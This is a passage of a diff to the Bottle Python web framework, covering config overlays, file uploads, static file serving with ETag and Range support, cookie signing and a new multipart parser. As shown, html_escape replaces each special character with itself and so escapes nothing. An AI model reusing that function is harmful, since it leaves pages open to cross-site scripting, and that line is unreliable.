in self._iter_overlays(): + overlay._delete_virtual(key) + + def _on_change(self, key, value): + for cb in self._change_listener: + if cb(self, key, value): + return True + + def _add_change_listener(self, func): + self._change_listener.append(func) + return func + + def meta_get(self, key, metafield, default=None): + """ Return the value of a meta field for a key. """ + return self._meta.get(key, {}).get(metafield, default) + + def meta_set(self, key, metafield, value): + """ Set the meta field for a key to a new value. + + Meta-fields are shared between all members of an overlay tree. + """ + self._meta.setdefault(key, {})[metafield] = value + + def meta_list(self, key): + """ Return an iterable of meta field names defined for a key. """ + return self._meta.get(key, {}).keys() + + def _define(self, key, default=_UNSET, help=_UNSET, validate=_UNSET): + """ (Unstable) Shortcut for plugins to define own config parameters. """ + if default is not _UNSET: + self.setdefault(key, default) + if help is not _UNSET: + self.meta_set(key, 'help', help) + if validate is not _UNSET: + self.meta_set(key, 'validate', validate) + + def _iter_overlays(self): + for ref in self._overlays: + overlay = ref() + if overlay is not None: + yield overlay + + def _make_overlay(self): + """ (Unstable) Create a new overlay that acts like a chained map: Values + missing in the overlay are copied from the source map. Both maps + share the same meta entries. + + Entries that were copied from the source are called 'virtual'. You + can not delete virtual keys, but overwrite them, which turns them + into non-virtual entries. Setting keys on an overlay never affects + its source, but may affect any number of child overlays. + + Other than collections.ChainMap or most other implementations, this + approach does not resolve missing keys on demand, but instead + actively copies all values from the source to the overlay and keeps + track of virtual and non-virtual keys internally. This removes any + lookup-overhead. Read-access is as fast as a build-in dict for both + virtual and non-virtual keys. + + Changes are propagated recursively and depth-first. A failing + on-change handler in an overlay stops the propagation of virtual + values and may result in an partly updated tree. Take extra care + here and make sure that on-change handlers never fail. + + Used by Route.config + """ + # Cleanup dead references + self._overlays[:] = [ref for ref in self._overlays if ref() is not None] + + overlay = ConfigDict() + overlay._meta = self._meta + overlay._source = self + self._overlays.append(weakref.ref(overlay)) + for key in self: + overlay._set_virtual(key, self[key]) + return overlay + + + class AppStack(list): """ A stack-like list. Calling it returns the head of the stack. """ def __call__(self): """ Return the current default application. """ - return self[-1] + return self.default def push(self, value=None): """ Add a new :class:`Bottle` instance to the stack """ @@ -1926,40 +2611,58 @@ def push(self, value=None): value = Bottle() self.append(value) return value + new_app = push + @property + def default(self): + try: + return self[-1] + except IndexError: + return self.push() -class WSGIFileWrapper(object): - def __init__(self, fp, buffer_size=1024*64): +class WSGIFileWrapper(object): + def __init__(self, fp, buffer_size=1024 * 64): self.fp, self.buffer_size = fp, buffer_size - for attr in ('fileno', 'close', 'read', 'readlines', 'tell', 'seek'): + for attr in 'fileno', 'close', 'read', 'readlines', 'tell', 'seek': if hasattr(fp, attr): setattr(self, attr, getattr(fp, attr)) def __iter__(self): buff, read = self.buffer_size, self.read - while True: - part = read(buff) - if not part: return + part = read(buff) + while part: yield part + part = read(buff) -class _iterchain(itertools.chain): - ''' This only exists to be able to attach a .close method to iterators that - do not support attribute assignment (most of itertools). ''' +class _closeiter(object): + """ This only exists to be able to attach a .close method to iterators that + do not support attribute assignment (most of itertools). """ + + def __init__(self, iterator, close=None): + self.iterator = iterator + self.close_callbacks = makelist(close) + + def __iter__(self): + return iter(self.iterator) + + def close(self): + for func in self.close_callbacks: + func() class ResourceManager(object): - ''' This class manages a list of search paths and helps to find and open + """ This class manages a list of search paths and helps to find and open application-bound resources (files). :param base: default value for :meth:`add_path` calls. :param opener: callable used to open resources. :param cachemode: controls which lookups are cached. One of 'all', 'found' or 'none'. - ''' + """ def __init__(self, base='./', opener=open, cachemode='all'): - self.opener = open + self.opener = opener self.base = base self.cachemode = cachemode @@ -1969,7 +2672,7 @@ def __init__(self, base='./', opener=open, cachemode='all'): self.cache = {} def add_path(self, path, base=None, index=None, create=False): - ''' Add a new path to the list of search paths. Return False if the + """ Add a new path to the list of search paths. Return False if the path does not exist. :param path: The new search path. Relative paths are turned into @@ -1984,7 +2687,7 @@ def add_path(self, path, base=None, index=None, create=False): along with a python module or package:: res.add_path('./resources/', __file__) - ''' + """ base = os.path.abspath(os.path.dirname(base or self.base)) path = os.path.abspath(os.path.join(base, os.path.dirname(path))) path += os.sep @@ -2000,7 +2703,7 @@ def add_path(self, path, base=None, index=None, create=False): return os.path.exists(path) def __iter__(self): - ''' Iterate over all existing files in all registered paths. ''' + """ Iterate over all existing files in all registered paths. """ search = self.path[:] while search: path = search.pop() @@ -2011,11 +2714,11 @@ def __iter__(self): else: yield full def lookup(self, name): - ''' Search for a resource and return an absolute file path, or `None`. + """ Search for a resource and return an absolute file path, or `None`. The :attr:`path` list is searched in order. The first match is - returend. Symlinks are followed. The result is cached to speed up - future lookups. ''' + returned. Symlinks are followed. The result is cached to speed up + future lookups. """ if name not in self.cache or DEBUG: for path in self.path: fpath = os.path.join(path, name) @@ -2028,22 +2731,84 @@ def lookup(self, name): return self.cache[name] def open(self, name, mode='r', *args, **kwargs): - ''' Find a resource and return a file object, or raise IOError. ''' + """ Find a resource and return a file object, or raise IOError. """ fname = self.lookup(name) if not fname: raise IOError("Resource %r not found." % name) - return self.opener(name, mode=mode, *args, **kwargs) + return self.opener(fname, mode=mode, *args, **kwargs) +class FileUpload(object): + def __init__(self, fileobj, name, filename, headers=None): + """ Wrapper for a single file uploaded via ``multipart/form-data``. """ + #: Open file(-like) object (BytesIO buffer or temporary file) + self.file = fileobj + #: Name of the upload form field + self.name = name + #: Raw filename as sent by the client (may contain unsafe characters) + self.raw_filename = filename + #: A :class:`HeaderDict` with additional headers (e.g. content-type) + self.headers = HeaderDict(headers) if headers else HeaderDict() + content_type = HeaderProperty('Content-Type') + content_length = HeaderProperty('Content-Length', reader=int, default=-1) + def get_header(self, name, default=None): + """ Return the value of a header within the multipart part. """ + return self.headers.get(name, default) + @cached_property + def filename(self): + """ Name of the file on the client file system, but normalized to ensure + file system compatibility. An empty filename is returned as 'empty'. + + Only ASCII letters, digits, dashes, underscores and dots are + allowed in the final filename. Accents are removed, if possible. + Whitespace is replaced by a single dash. Leading or tailing dots + or dashes are removed. The filename is limited to 255 characters. + """ + fname = self.raw_filename + if not isinstance(fname, unicode): + fname = fname.decode('utf8', 'ignore') + fname = normalize('NFKD', fname) + fname = fname.encode('ASCII', 'ignore').decode('ASCII') + fname = os.path.basename(fname.replace('\\', os.path.sep)) + fname = re.sub(r'[^a-zA-Z0-9-_.\s]', '', fname).strip() + fname = re.sub(r'[-\s]+', '-', fname).strip('.-') + return fname[:255] or 'empty' + + def _copy_file(self, fp, chunk_size=2 ** 16): + read, write, offset = self.file.read, fp.write, self.file.tell() + while 1: + buf = read(chunk_size) + if not buf: break + write(buf) + self.file.seek(offset) + + def save(self, destination, overwrite=False, chunk_size=2 ** 16): + """ Save file to disk or copy its content to an open file(-like) object. + If *destination* is a directory, :attr:`filename` is added to the + path. Existing files are not overwritten by default (IOError). + + :param destination: File path, directory or file(-like) object. + :param overwrite: If True, replace existing files. (default: False) + :param chunk_size: Bytes to read at a time. (default: 64kb) + """ + if isinstance(destination, basestring): # Except file-likes here + if os.path.isdir(destination): + destination = os.path.join(destination, self.filename) + if not overwrite and os.path.exists(destination): + raise IOError('File exists.') + with open(destination, 'wb') as fp: + self._copy_file(fp, chunk_size) + else: + self._copy_file(destination, chunk_size) ############################################################################### # Application Helper ########################################################### ############################################################################### -def abort(code=500, text='Unknown Error: Application stopped.'): +def abort(code=500, text='Unknown Error.'): """ Aborts execution and causes a HTTP error. """ raise HTTPError(code, text) @@ -2051,31 +2816,67 @@ def abort(code=500, text='Unknown Error: Application stopped.'): def redirect(url, code=None): """ Aborts execution and causes a 303 or 302 redirect, depending on the HTTP protocol version. """ - if code is None: + if not code: code = 303 if request.get('SERVER_PROTOCOL') == "HTTP/1.1" else 302 - location = urljoin(request.url, url) - raise HTTPResponse("", status=code, Location=location) + res = response.copy(cls=HTTPResponse) + res.status = code + res.body = "" + res.set_header('Location', urljoin(request.url, url)) + raise res -def _file_iter_range(fp, offset, bytes, maxread=1024*1024): - ''' Yield chunks from a range in a file. No chunk is bigger than maxread.''' +def _rangeiter(fp, offset, limit, bufsize=1024 * 1024): + """ Yield chunks from a range in a file. """ fp.seek(offset) - while bytes > 0: - part = fp.read(min(bytes, maxread)) - if not part: break - bytes -= len(part) + while limit > 0: + part = fp.read(min(limit, bufsize)) + if not part: + break + limit -= len(part) yield part -def static_file(filename, root, mimetype='auto', download=False): - """ Open a file in a safe way and return :exc:`HTTPResponse` with status - code 200, 305, 401 or 404. Set Content-Type, Content-Encoding, - Content-Length and Last-Modified header. Obey If-Modified-Since header - and HEAD requests. +def static_file(filename, root, + mimetype=True, + download=False, + charset='UTF-8', + etag=None, + headers=None): + """ Open a file in a safe way and return an instance of :exc:`HTTPResponse` + that can be sent back to the client. + + :param filename: Name or path of the file to send, relative to ``root``. + :param root: Root path for file lookups. Should be an absolute directory + path. + :param mimetype: Provide the content-type header (default: guess from + file extension) + :param download: If True, ask the browser to open a `Save as...` dialog + instead of opening the file with the associated program. You can + specify a custom filename as a string. If not specified, the + original filename is used (default: False). + :param charset: The charset for files with a ``text/*`` mime-type. + (default: UTF-8) + :param etag: Provide a pre-computed ETag header. If set to ``False``, + ETag handling is disabled. (default: auto-generate ETag header) + :param headers: Additional headers dict to add to the response. + + While checking user input is always a good idea, this function provides + additional protection against malicious ``filename`` parameters from + breaking out of the ``root`` directory and leaking sensitive information + to an attacker. + + Read-protected files or files outside of the ``root`` directory are + answered with ``403 Access Denied``. Missing files result in a + ``404 Not Found`` response. Conditional requests (``If-Modified-Since``, + ``If-None-Match``) are answered with ``304 Not Modified`` whenever + possible. ``HEAD`` and ``Range`` requests (used by download managers to + check or continue partial downloads) are also handled automatically. """ - root = os.path.abspath(root) + os.sep + + root = os.path.join(os.path.abspath(root), '') filename = os.path.abspath(os.path.join(root, filename.strip('/\\'))) - headers = dict() + headers = headers.copy() if headers else {} + getenv = request.environ.get if not filename.startswith(root): return HTTPError(403, "Access denied.") @@ -2084,49 +2885,66 @@ def static_file(filename, root, mimetype='auto', download=False): if not os.access(filename, os.R_OK): return HTTPError(403, "You do not have permission to access this file.") - if mimetype == 'auto': - mimetype, encoding = mimetypes.guess_type(filename) - if mimetype: headers['Content-Type'] = mimetype - if encoding: headers['Content-Encoding'] = encoding - elif mimetype: + if mimetype is True: + name = download if isinstance(download, str) else filename + mimetype, encoding = mimetypes.guess_type(name) + if encoding == 'gzip': + mimetype = 'application/gzip' + elif encoding: # e.g. bzip2 -> application/x-bzip2 + mimetype = 'application/x-' + encoding + + if charset and mimetype and 'charset=' not in mimetype \ + and (mimetype[:5] == 'text/' or mimetype == 'application/javascript'): + mimetype += '; charset=%s' % charset + + if mimetype: headers['Content-Type'] = mimetype + if download is True: + download = os.path.basename(filename) + if download: - download = os.path.basename(filename if download == True else download) + download = download.replace('"','') headers['Content-Disposition'] = 'attachment; filename="%s"' % download stats = os.stat(filename) headers['Content-Length'] = clen = stats.st_size - lm = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime(stats.st_mtime)) - headers['Last-Modified'] = lm + headers['Last-Modified'] = email.utils.formatdate(stats.st_mtime, usegmt=True) + headers['Date'] = email.utils.formatdate(time.time(), usegmt=True) + + if etag is None: + etag = '%d:%d:%d:%d:%s' % (stats.st_dev, stats.st_ino, stats.st_mtime, + clen, filename) + etag = hashlib.sha1(tob(etag)).hexdigest() + + if etag: + headers['ETag'] = etag + check = getenv('HTTP_IF_NONE_MATCH') + if check and check == etag: + return HTTPResponse(status=304, **headers) - ims = request.environ.get('HTTP_IF_MODIFIED_SINCE') + ims = getenv('HTTP_IF_MODIFIED_SINCE') if ims: ims = parse_date(ims.split(";")[0].strip()) - if ims is not None and ims >= int(stats.st_mtime): - headers['Date'] = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime()) - return HTTPResponse(status=304, **headers) + if ims is not None and ims >= int(stats.st_mtime): + return HTTPResponse(status=304, **headers) body = '' if request.method == 'HEAD' else open(filename, 'rb') headers["Accept-Ranges"] = "bytes" - ranges = request.environ.get('HTTP_RANGE') - if 'HTTP_RANGE' in request.environ: - ranges = list(parse_range_header(request.environ['HTTP_RANGE'], clen)) + range_header = getenv('HTTP_RANGE') + if range_header: + ranges = list(parse_range_header(range_header, clen)) if not ranges: return HTTPError(416, "Requested Range Not Satisfiable") offset, end = ranges[0] - headers["Content-Range"] = "bytes %d-%d/%d" % (offset, end-1, clen) - headers["Content-Length"] = str(end-offset) - if body: body = _file_iter_range(body, offset, end-offset) + rlen = end - offset + headers["Content-Range"] = "bytes %d-%d/%d" % (offset, end - 1, clen) + headers["Content-Length"] = str(rlen) + if body: body = _closeiter(_rangeiter(body, offset, rlen), body.close) return HTTPResponse(body, status=206, **headers) return HTTPResponse(body, **headers) - - - - - ############################################################################### # HTTP Utilities and MISC (TODO) ############################################### ############################################################################### @@ -2136,14 +2954,31 @@ def debug(mode=True): """ Change the debug level. There is only one debug level supported at the moment.""" global DEBUG + if mode: warnings.simplefilter('default') DEBUG = bool(mode) +def http_date(value): + if isinstance(value, basestring): + return value + if isinstance(value, datetime): + # aware datetime.datetime is converted to UTC time + # naive datetime.datetime is treated as UTC time + value = value.utctimetuple() + elif isinstance(value, datedate): + # datetime.date is naive, and is treated as UTC time + value = value.timetuple() + if not isinstance(value, (int, float)): + # convert struct_time in UTC to UNIX timestamp + value = calendar.timegm(value) + return email.utils.formatdate(value, usegmt=True) + + def parse_date(ims): """ Parse rfc1123, rfc850 and asctime timestamps and return UTC epoch. """ try: ts = email.utils.parsedate_tz(ims) - return time.mktime(ts[:8] + (0,)) - (ts[9] or 0) - time.timezone + return calendar.timegm(ts[:8] + (0, )) - (ts[9] or 0) except (TypeError, ValueError, IndexError, OverflowError): return None @@ -2153,32 +2988,70 @@ def parse_auth(header): try: method, data = header.split(None, 1) if method.lower() == 'basic': - user, pwd = touni(base64.b64decode(tob(data))).split(':',1) + user, pwd = touni(base64.b64decode(tob(data))).split(':', 1) return user, pwd except (KeyError, ValueError): return None + def parse_range_header(header, maxlen=0): - ''' Yield (start, end) ranges parsed from a HTTP Range header. Skip - unsatisfiable ranges. The end index is non-inclusive.''' + """ Yield (start, end) ranges parsed from a HTTP Range header. Skip + unsatisfiable ranges. The end index is non-inclusive.""" if not header or header[:6] != 'bytes=': return ranges = [r.split('-', 1) for r in header[6:].split(',') if '-' in r] for start, end in ranges: try: if not start: # bytes=-100 -> last 100 bytes - start, end = max(0, maxlen-int(end)), maxlen + start, end = max(0, maxlen - int(end)), maxlen elif not end: # bytes=100- -> all but the first 99 bytes start, end = int(start), maxlen - else: # bytes=100-200 -> bytes 100-200 (inclusive) - start, end = int(start), min(int(end)+1, maxlen) + else: # bytes=100-200 -> bytes 100-200 (inclusive) + start, end = int(start), min(int(end) + 1, maxlen) if 0 <= start < end <= maxlen: yield start, end except ValueError: pass + +#: Header tokenizer used by _parse_http_header() +_hsplit = re.compile('(?:(?:"((?:[^"\\\\]|\\\\.)*)")|([^;,=]+))([;,=]?)').findall + +def _parse_http_header(h): + """ Parses a typical multi-valued and parametrised HTTP header (e.g. Accept headers) and returns a list of values + and parameters. For non-standard or broken input, this implementation may return partial results. + :param h: A header string (e.g. ``text/html,text/plain;q=0.9,*/*;q=0.8``) + :return: List of (value, params) tuples. The second element is a (possibly empty) dict. + """ + values = [] + if '"' not in h: # INFO: Fast path without regexp (~2x faster) + for value in h.split(','): + parts = value.split(';') + values.append((parts[0].strip(), {})) + for attr in parts[1:]: + name, value = attr.split('=', 1) + values[-1][1][name.strip().lower()] = value.strip() + else: + lop, key, attrs = ',', None, {} + for quoted, plain, tok in _hsplit(h): + value = plain.strip() if plain else quoted.replace('\\"', '"') + if lop == ',': + attrs = {} + values.append((value, attrs)) + elif lop == ';': + if tok == '=': + key = value + else: + attrs[value.strip().lower()] = '' + elif lop == '=' and key: + attrs[key.strip().lower()] = value + key = None + lop = tok + return values + + def _parse_qsl(qs): r = [] - for pair in qs.replace(';','&').split('&'): + for pair in qs.split('&'): if not pair: continue nv = pair.split('=', 1) if len(nv) != 2: nv.append('') @@ -2187,44 +3060,55 @@ def _parse_qsl(qs): r.append((key, value)) return r + def _lscmp(a, b): - ''' Compares two strings in a cryptographically safe way: - Runtime is not affected by length of common prefix. ''' - return not sum(0 if x==y else 1 for x, y in zip(a, b)) and len(a) == len(b) + """ Compares two strings in a cryptographically safe way: + Runtime is not affected by length of common prefix. """ + return not sum(0 if x == y else 1 + for x, y in zip(a, b)) and len(a) == len(b) -def cookie_encode(data, key): - ''' Encode and sign a pickle-able object. Return a (byte) string ''' +def cookie_encode(data, key, digestmod=None): + """ Encode and sign a pickle-able object. Return a (byte) string """ + depr(0, 13, "cookie_encode() will be removed soon.", + "Do not use this API directly.") + digestmod = digestmod or hashlib.sha256 msg = base64.b64encode(pickle.dumps(data, -1)) - sig = base64.b64encode(hmac.new(tob(key), msg).digest()) + sig = base64.b64encode(hmac.new(tob(key), msg, digestmod=digestmod).digest()) return tob('!') + sig + tob('?') + msg -def cookie_decode(data, key): - ''' Verify and decode an encoded string. Return an object or None.''' +def cookie_decode(data, key, digestmod=None): + """ Verify and decode an encoded string. Return an object or None.""" + depr(0, 13, "cookie_decode() will be removed soon.", + "Do not use this API directly.") data = tob(data) if cookie_is_encoded(data): sig, msg = data.split(tob('?'), 1) - if _lscmp(sig[1:], base64.b64encode(hmac.new(tob(key), msg).digest())): + digestmod = digestmod or hashlib.sha256 + hashed = hmac.new(tob(key), msg, digestmod=digestmod).digest() + if _lscmp(sig[1:], base64.b64encode(hashed)): return pickle.loads(base64.b64decode(msg)) return None def cookie_is_encoded(data): - ''' Return True if the argument looks like a encoded cookie.''' + """ Return True if the argument looks like a encoded cookie.""" + depr(0, 13, "cookie_is_encoded() will be removed soon.", + "Do not use this API directly.") return bool(data.startswith(tob('!')) and tob('?') in data) def html_escape(string): - ''' Escape HTML special characters ``&<>`` and quotes ``'"``. ''' - return string.replace('&','&').replace('<','<').replace('>','>')\ - .replace('"','"').replace("'",''') + """ Escape HTML special characters ``&<>`` and quotes ``'"``. """ + return string.replace('&', '&').replace('<', '<').replace('>', '>')\ + .replace('"', '"').replace("'", ''') def html_quote(string): - ''' Escape and quote a string to be used as an HTTP attribute.''' - return '"%s"' % html_escape(string).replace('\n','%#10;')\ - .replace('\r',' ').replace('\t',' ') + """ Escape and quote a string to be used as an HTTP attribute.""" + return '"%s"' % html_escape(string).replace('\n', ' ')\ + .replace('\r', ' ').replace('\t', ' ') def yieldroutes(func): @@ -2233,40 +3117,39 @@ def yieldroutes(func): takes optional keyword arguments. The output is best described by example:: a() -> '/a' - b(x, y) -> '/b/:x/:y' - c(x, y=5) -> '/c/:x' and '/c/:x/:y' - d(x=5, y=6) -> '/d' and '/d/:x' and '/d/:x/:y' + b(x, y) -> '/b/<x>/<y>' + c(x, y=5) -> '/c/<x>' and '/c/<x>/<y>' + d(x=5, y=6) -> '/d' and '/d/<x>' and '/d/<x>/<y>' """ - import inspect # Expensive module. Only import if necessary. - path = '/' + func.__name__.replace('__','/').lstrip('/') - spec = inspect.getargspec(func) + path = '/' + func.__name__.replace('__', '/').lstrip('/') + spec = getargspec(func) argc = len(spec[0]) - len(spec[3] or []) - path += ('/:%s' * argc) % tuple(spec[0][:argc]) + path += ('/<%s>' * argc) % tuple(spec[0][:argc]) yield path for arg in spec[0][argc:]: - path += '/:%s' % arg + path += '/<%s>' % arg yield path def path_shift(script_name, path_info, shift=1): - ''' Shift path fragments from PATH_INFO to SCRIPT_NAME and vice versa. + """ Shift path fragments from PATH_INFO to SCRIPT_NAME and vice versa. :return: The modified paths. :param script_name: The SCRIPT_NAME path. :param script_name: The PATH_INFO path. :param shift: The number of path fragments to shift. May be negative to change the shift direction. (default: 1) - ''' + """ if shift == 0: return script_name, path_info pathlist = path_info.strip('/').split('/') scriptlist = script_name.strip('/').split('/') if pathlist and pathlist[0] == '': pathlist = [] if scriptlist and scriptlist[0] == '': scriptlist = [] - if shift > 0 and shift <= len(pathlist): + if 0 < shift <= len(pathlist): moved = pathlist[:shift] scriptlist = scriptlist + moved pathlist = pathlist[shift:] - elif shift < 0 and shift >= -len(scriptlist): + elif 0 > shift >= -len(scriptlist): moved = scriptlist[shift:] pathlist = moved + pathlist scriptlist = scriptlist[:shift] @@ -2279,56 +3162,45 @@ def path_shift(script_name, path_info, shift=1): return new_script_name, new_path_info -def validate(**vkargs): - """ - Validates and manipulates keyword arguments by user defined callables. - Handles ValueError and missing arguments by raising HTTPError(403). - """ - depr('Use route wildcard filters instead.') +def auth_basic(check, realm="private", text="Access denied"): + """ Callback decorator to require HTTP auth (basic). + TODO: Add route(check_auth=...) parameter. """ + def decorator(func): + @functools.wraps(func) - def wrapper(*args, **kargs): - for key, value in vkargs.items(): - if key not in kargs: - abort(403, 'Missing parameter: %s' % key) - try: - kargs[key] = value(kargs[key]) - except ValueError: - abort(403, 'Wrong parameter format for: %s' % key) - return func(*args, **kargs) - return wrapper - return decorator + def wrapper(*a, **ka): + user, password = request.auth or (None, None) + if user is None or not check(user, password): + err = HTTPError(401, text) + err.add_header('WWW-Authenticate', 'Basic realm="%s"' % realm) + return err + return func(*a, **ka) + return wrapper -def auth_basic(check, realm="private", text="Access denied"): - ''' Callback decorator to require HTTP auth (basic). - TODO: Add route(check_auth=...) parameter. ''' - def decorator(func): - def wrapper(*a, **ka): - user, password = request.auth or (None, None) - if user is None or not check(user, password): - response.headers['WWW-Authenticate'] = 'Basic realm="%s"' % realm - return HTTPError(401, text) - return func(*a, **ka) - return wrapper return decorator - # Shortcuts for common Bottle methods. # They all refer to the current default application. + def make_default_app_wrapper(name): - ''' Return a callable that relays calls to the current default app. ''' + """ Return a callable that relays calls to the current default app. """ + @functools.wraps(getattr(Bottle, name)) def wrapper(*a, **ka): return getattr(app(), name)(*a, **ka) + return wrapper + route = make_default_app_wrapper('route') get = make_default_app_wrapper('get') post = make_default_app_wrapper('post') put = make_default_app_wrapper('put') delete = make_default_app_wrapper('delete') +patch = make_default_app_wrapper('patch') error = make_default_app_wrapper('error') mount = make_default_app_wrapper('mount') hook = make_default_app_wrapper('hook') @@ -2337,63 +3209,374 @@ def wrapper(*a, **ka): url = make_default_app_wrapper('get_url') +############################################################################### +# Multipart Handling ########################################################### +############################################################################### +# cgi.FieldStorage was deprecated in Python 3.11 and removed in 3.13 +# This implementation is based on https://github.com/defnull/multipart/ + + +class MultipartError(HTTPError): + def __init__(self, msg): + HTTPError.__init__(self, 400, "MultipartError: " + msg) + + +class _MultipartParser(object): + def __init__( + self, + stream, + boundary, + content_length=-1, + disk_limit=2 ** 30, + mem_limit=2 ** 20, + memfile_limit=2 ** 18, + buffer_size=2 ** 16, + charset="latin1", + ): + self.stream = stream + self.boundary = boundary + self.content_length = content_length + self.disk_limit = disk_limit + self.memfile_limit = memfile_limit + self.mem_limit = min(mem_limit, self.disk_limit) + self.buffer_size = min(buffer_size, self.mem_limit) + self.charset = charset + + if not boundary: + raise MultipartError("No boundary.") + + if self.buffer_size - 6 < len(boundary): # "--boundary--\r\n" + raise MultipartError("Boundary does not fit into buffer_size.") + + def _lineiter(self): + """ Iterate over a binary file-like object (crlf terminated) line by + line. Each line is returned as a (line, crlf) tuple. Lines larger + than buffer_size are split into chunks where all but the last chunk + has an empty string instead of crlf. Maximum chunk size is twice the + buffer size. + """ + + read = self.stream.read + maxread, maxbuf = self.content_length, self.buffer_size + partial = b"" # Contains the last (partial) line + + while True: + chunk = read(maxbuf if maxread < 0 else min(maxbuf, maxread)) + maxread -= len(chunk) + if not chunk: + if partial: + yield partial, b'' + break + + if partial: + chunk = partial + chunk + + scanpos = 0 + while True: + i = chunk.find(b'\r\n', scanpos) + if i >= 0: + yield chunk[scanpos:i], b'\r\n' + scanpos = i + 2 + else: # CRLF not found + partial = chunk[scanpos:] if scanpos else chunk + break + + if len(partial) > maxbuf: + yield partial[:-1], b"" + partial = partial[-1:] + + def parse(self): + """ Return a MultiPart iterator. Can only be called once. """ + + lines, line = self._lineiter(), "" + separator = b"--" + tob(self.boundary) + terminator = separator + b"--" + mem_used, disk_used = 0, 0 # Track used resources to prevent DoS + is_tail = False # True if the last line was incomplete (cutted) + + # Consume first boundary. Ignore any preamble, as required by RFC + # 2046, section 5.1.1. + for line, nl in lines: + if line in (separator, terminator): + break + else: + raise MultipartError("Stream does not contain boundary") + + # First line is termainating boundary -> empty multipart stream + if line == terminator: + for _ in lines: + raise MultipartError("Found data after empty multipart stream") + return + + part_options = { + "buffer_size": self.buffer_size, + "memfile_limit": self.memfile_limit, + "charset": self.charset, + } + part = _MultipartPart(**part_options) + + for line, nl in lines: + if not is_tail and (line == separator or line == terminator): + part.finish() + if part.is_buffered(): + mem_used += part.size + else: + disk_used += part.size + yield part + if line == terminator: + break + part = _MultipartPart(**part_options) + else: + is_tail = not nl # The next line continues this one + try: + part.feed(line, nl) + if part.is_buffered(): + if part.size + mem_used > self.mem_limit: + raise MultipartError("Memory limit reached.") + elif part.size + disk_used > self.disk_limit: + raise MultipartError("Disk limit reached.") + except MultipartError: + part.close() + raise + else: + part.close() + + if line != terminator: + raise MultipartError("Unexpected end of multipart stream.") + + +class _MultipartPart(object): + def __init__(self, buffer_size=2 ** 16, memfile_limit=2 ** 18, charset="latin1"): + self.headerlist = [] + self.headers = None + self.file = False + self.size = 0 + self._buf = b"" + self.disposition = None + self.name = None + self.filename = None + self.content_type = None + self.charset = charset + self.memfile_limit = memfile_limit + self.buffer_size = buffer_size + + def feed(self, line, nl=""): + if self.file: + return self.write_body(line, nl) + return self.write_header(line, nl) + + def write_header(self, line, nl): + line = line.decode(self.charset) + + if not nl: + raise MultipartError("Unexpected end of line in header.") + + if not line.strip(): # blank line -> end of header segment + self.finish_header() + elif line[0] in " \t" and self.headerlist: + name, value = self.headerlist.pop() + self.headerlist.append((name, value + line.strip())) + else: + if ":" not in line: + raise MultipartError("Syntax error in header: No colon.") + + name, value = line.split(":", 1) + self.headerlist.append((name.strip(), value.strip())) + + def write_body(self, line, nl): + if not line and not nl: + return # This does not even flush the buffer + + self.size += len(line) + len(self._buf) + self.file.write(self._buf + line) + self._buf = nl + if self.content_length > 0 and self.size > self.content_length: + raise MultipartError("Size of body exceeds Content-Length header.") + if self.size > self.memfile_limit and isinstance(self.file, BytesIO): + self.file, old = NamedTemporaryFile(mode="w+b"), self.file + old.seek(0) + copied, maxcopy, chunksize = 0, self.size, self.buffer_size + read, write = old.read, self.file.write + while copied < maxcopy: + chunk = read(min(chunksize, maxcopy - copied)) + write(chunk) + copied += len(chunk) + def finish_header(self): + self.file = BytesIO() + self.headers = HeaderDict(self.headerlist) + content_disposition = self.headers.get("Content-Disposition") + content_type = self.headers.get("Content-Type") + + if not content_disposition: + raise MultipartError("Content-Disposition header is missing.") + + self.disposition, self.options = _parse_http_header(content_disposition)[0] + self.name = self.options.get("name") + if "filename" in self.options: + self.filename = self.options.get("filename") + if self.filename[1:3] == ":\\" or self.filename[:2] == "\\\\": + self.filename = self.filename.split("\\")[-1] # ie6 bug + + self.content_type, options = _parse_http_header(content_type)[0] if content_type else (None, {}) + self.charset = options.get("charset") or self.charset + + self.content_length = int(self.headers.get("Content-Length", "-1")) + + def finish(self): + if not self.file: + raise MultipartError("Incomplete part: Header section not closed.") + self.file.seek(0) + + def is_buffered(self): + """ Return true if the data is fully buffered in memory.""" + return isinstance(self.file, BytesIO) + + @property + def value(self): + """ Data decoded with the specified charset """ + + return self.raw.decode(self.charset) + + @property + def raw(self): + """ Data without decoding """ + pos = self.file.tell() + self.file.seek(0) + + try: + return self.file.read() + finally: + self.file.seek(pos) + + def close(self): + if self.file: + self.file.close() + self.file = False ############################################################################### # Server Adapter ############################################################### ############################################################################### +# Before you edit or add a server adapter, please read: +# - https://github.com/bottlepy/bottle/pull/647#issuecomment-60152870 +# - https://github.com/bottlepy/bottle/pull/865#issuecomment-242795341 class ServerAdapter(object): quiet = False - def __init__(self, host='127.0.0.1', port=8080, **config): - self.options = config + + def __init__(self, host='127.0.0.1', port=8080, **options): + self.options = options self.host = host self.port = int(port) - def run(self, handler): # pragma: no cover + def run(self, handler): # pragma: no cover pass def __repr__(self): - args = ', '.join(['%s=%s'%(k,repr(v)) for k, v in self.options.items()]) + args = ', '.join('%s=%s' % (k, repr(v)) + for k, v in self.options.items()) return "%s(%s)" % (self.__class__.__name__, args) class CGIServer(ServerAdapter): quiet = True - def run(self, handler): # pragma: no cover + + def run(self, handler): # pragma: no cover from wsgiref.handlers import CGIHandler + def fixed_environ(environ, start_response): environ.setdefault('PATH_INFO', '') return handler(environ, start_response) + CGIHandler().run(fixed_environ) class FlupFCGIServer(ServerAdapter): - def run(self, handler): # pragma: no cover + def run(self, handler): # pragma: no cover import flup.server.fcgi self.options.setdefault('bindAddress', (self.host, self.port)) flup.server.fcgi.WSGIServer(handler, **self.options).run() class WSGIRefServer(ServerAdapter): - def run(self, handler): # pragma: no cover - from wsgiref.simple_server import make_server, WSGIRequestHandler - if self.quiet: - class QuietHandler(WSGIRequestHandler): - def log_request(*args, **kw): pass - self.options['handler_class'] = QuietHandler - srv = make_server(self.host, self.port, handler, **self.options) - srv.serve_forever() + def run(self, app): # pragma: no cover + from wsgiref.simple_server import make_server + from wsgiref.simple_server import WSGIRequestHandler, WSGIServer + import socket + + class FixedHandler(WSGIRequestHandler): + def address_string(self): # Prevent reverse DNS lookups please. + return self.client_address[0] + + def log_request(*args, **kw): + if not self.quiet: + return WSGIRequestHandler.log_request(*args, **kw) + + handler_cls = self.options.get('handler_class', FixedHandler) + server_cls = self.options.get('server_class', WSGIServer) + + if ':' in self.host: # Fix wsgiref for IPv6 addresses. + if getattr(server_cls, 'address_family') == socket.AF_INET: + + class server_cls(server_cls): + address_family = socket.AF_INET6 + + self.srv = make_server(self.host, self.port, app, 